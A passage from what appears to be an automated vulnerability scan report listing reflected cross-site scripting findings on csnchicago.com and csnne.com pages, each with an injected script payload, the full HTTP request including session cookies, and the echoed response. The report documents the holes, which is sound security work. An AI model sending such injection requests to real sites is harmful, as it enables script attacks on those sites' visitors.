Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 12087<script>alert(1)</script>97d28fbeadd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player12087<script>alert(1)</script>97d28fbeadd/player.php HTTP/1.1
Host: www.csnchicago.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:09 GMT
Content-Length: 791
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player12087<script>alert(1)</script>97d28fbeadd/player.php"</strong>
...[SNIP]...

2.321. http://www.csnchicago.com/common/global_flash/player/player.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnchicago.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 45acb<script>alert(1)</script>0a509351314 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player/player.php45acb<script>alert(1)</script>0a509351314 HTTP/1.1
Host: www.csnchicago.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:10 GMT
Content-Length: 791
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player/player.php45acb<script>alert(1)</script>0a509351314"</strong>
...[SNIP]...

2.322. http://www.csnchicago.com/common/js/aggregate.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnchicago.com
Path:   /common/js/aggregate.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 35984<script>alert(1)</script>1a5e9f78bd3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/js/35984<script>alert(1)</script>1a5e9f78bd3 HTTP/1.1
Host: www.csnchicago.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:18 GMT
Content-Length: 764
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/js/35984<script>alert(1)</script>1a5e9f78bd3"</strong>
...[SNIP]...

2.323. http://www.csnchicago.com/pages/video [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnchicago.com
Path:   /pages/video

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ddf4b<script>alert(1)</script>ce17d6abda2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesddf4b<script>alert(1)</script>ce17d6abda2/video HTTP/1.1
Host: www.csnchicago.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:21 GMT
Content-Length: 765
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pagesddf4b<script>alert(1)</script>ce17d6abda2/video"</strong>
...[SNIP]...

2.324. http://www.csnchicago.com/pages/video [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnchicago.com
Path:   /pages/video

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aa09c<script>alert(1)</script>73e8f648bdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/videoaa09c<script>alert(1)</script>73e8f648bdb HTTP/1.1
Host: www.csnchicago.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:22 GMT
Content-Length: 784
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/videoaa09c<script>alert(1)</script>73e8f648bdb"</strong>
...[SNIP]...

2.325. http://www.csnchicago.com/pages/video [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnchicago.com
Path:   /pages/video

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b3ee"><script>alert(1)</script>9e4828c59e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/video?6b3ee"><script>alert(1)</script>9e4828c59e6=1 HTTP/1.1
Host: www.csnchicago.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=2aca36b-12cffe27275-48edbb39-2; __utmz=1.1292783236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=c2b89bdf64649568e45d5e768d3d804d; __utma=1.1102200564.1292783236.1292783236.1292783236.1; __utmc=1; __utmb=10710310;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 67847
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="6b3ee"><script>alert(1)</script>9e4828c59e6" id = "6b3ee">
...[SNIP]...

2.326. http://www.csnne.com/12/16/10/Mom-Theyre-picking-on-Curran/v1_landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/16/10/Mom-Theyre-picking-on-Curran/v1_landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4a71f<script>alert(1)</script>2887b9b00bd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16/10/Mom-Theyre-picking-on-Curran/v1_landing.html4a71f<script>alert(1)</script>2887b9b00bd HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:38 GMT
Content-Length: 797
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/16/10/Mom-Theyre-picking-on-Curran/v1_landing.html4a71f<script>alert(1)</script>2887b9b00bd"</strong>
...[SNIP]...

2.327. http://www.csnne.com/12/16/10/NFL-Picks-Week-15/landing_insider_levine.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/16/10/NFL-Picks-Week-15/landing_insider_levine.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d17d2<script>alert(1)</script>f9289778c74 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16/10/NFL-Picks-Week-15/landing_insider_levine.htmld17d2<script>alert(1)</script>f9289778c74 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:21 GMT
Content-Length: 798
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/16/10/NFL-Picks-Week-15/landing_insider_levine.htmld17d2<script>alert(1)</script>f9289778c74"</strong>
...[SNIP]...

2.328. http://www.csnne.com/12/16/10/Patriots-dont-let-injuries-stop-them/landing_patriots.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/16/10/Patriots-dont-let-injuries-stop-them/landing_patriots.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d901d<script>alert(1)</script>208d2f1091e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16/10/Patriots-dont-let-injuries-stop-them/landing_patriots.htmld901d<script>alert(1)</script>208d2f1091e HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:24 GMT
Content-Length: 811
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/16/10/Patriots-dont-let-injuries-stop-them/landing_patriots.htmld901d<script>alert(1)</script>208d2f1091e"</strong>
...[SNIP]...

2.329. http://www.csnne.com/12/16/10/Same-old-same-old/landing_heyfelger.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/16/10/Same-old-same-old/landing_heyfelger.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f51b3<script>alert(1)</script>ceb771a37f8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16/10/Same-old-same-old/landing_heyfelger.htmlf51b3<script>alert(1)</script>ceb771a37f8 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:27 GMT
Content-Length: 793
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/16/10/Same-old-same-old/landing_heyfelger.htmlf51b3<script>alert(1)</script>ceb771a37f8"</strong>
...[SNIP]...

2.330. http://www.csnne.com/12/16/10/The-un-firing-of-Brian-Cashman/v1_landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/16/10/The-un-firing-of-Brian-Cashman/v1_landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2468a<script>alert(1)</script>197191a820e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16/10/The-un-firing-of-Brian-Cashman/v1_landing.html2468a<script>alert(1)</script>197191a820e HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:25 GMT
Content-Length: 799
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/16/10/The-un-firing-of-Brian-Cashman/v1_landing.html2468a<script>alert(1)</script>197191a820e"</strong>
...[SNIP]...

2.331. http://www.csnne.com/12/17/10/Antoine-Walkers-not-a-Maine-man/landing_insider_levine.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/17/10/Antoine-Walkers-not-a-Maine-man/landing_insider_levine.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1dc77<script>alert(1)</script>063063ef963 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Antoine-Walkers-not-a-Maine-man/landing_insider_levine.html1dc77<script>alert(1)</script>063063ef963 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:29 GMT
Content-Length: 812
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Antoine-Walkers-not-a-Maine-man/landing_insider_levine.html1dc77<script>alert(1)</script>063063ef963"</strong>
...[SNIP]...

2.332. http://www.csnne.com/12/17/10/Give-it-a-rest-Rajon/landing_wakeup.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/17/10/Give-it-a-rest-Rajon/landing_wakeup.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b550d<script>alert(1)</script>cd7948c1da0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Give-it-a-rest-Rajon/landing_wakeup.htmlb550d<script>alert(1)</script>cd7948c1da0 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:34 GMT
Content-Length: 793
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Give-it-a-rest-Rajon/landing_wakeup.htmlb550d<script>alert(1)</script>cd7948c1da0"</strong>
...[SNIP]...

2.333. http://www.csnne.com/12/17/10/Jenks-ex-coach-thinks-hell-shine-with-Re/landing_redsox.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/17/10/Jenks-ex-coach-thinks-hell-shine-with-Re/landing_redsox.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e9ff3<script>alert(1)</script>c5ba4678e22 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Jenks-ex-coach-thinks-hell-shine-with-Re/landing_redsox.htmle9ff3<script>alert(1)</script>c5ba4678e22 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:31 GMT
Content-Length: 813
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Jenks-ex-coach-thinks-hell-shine-with-Re/landing_redsox.htmle9ff3<script>alert(1)</script>c5ba4678e22"</strong>
...[SNIP]...

2.334. http://www.csnne.com/12/17/10/Minnesota-collapse-Its-all-Favres-fault-/landing_wgs.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/17/10/Minnesota-collapse-Its-all-Favres-fault-/landing_wgs.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 73f49<script>alert(1)</script>e95cce5ad7c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Minnesota-collapse-Its-all-Favres-fault-/landing_wgs.html73f49<script>alert(1)</script>e95cce5ad7c HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:33 GMT
Content-Length: 810
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Minnesota-collapse-Its-all-Favres-fault-/landing_wgs.html73f49<script>alert(1)</script>e95cce5ad7c"</strong>
...[SNIP]...

2.335. http://www.csnne.com/12/17/10/Robinson-at-point-guard-will-be-a-learni/landing_celtics.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/17/10/Robinson-at-point-guard-will-be-a-learni/landing_celtics.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload db6a8<script>alert(1)</script>f71ddd8b509 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Robinson-at-point-guard-will-be-a-learni/landing_celtics.htmldb6a8<script>alert(1)</script>f71ddd8b509 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:33 GMT
Content-Length: 814
Connection: close

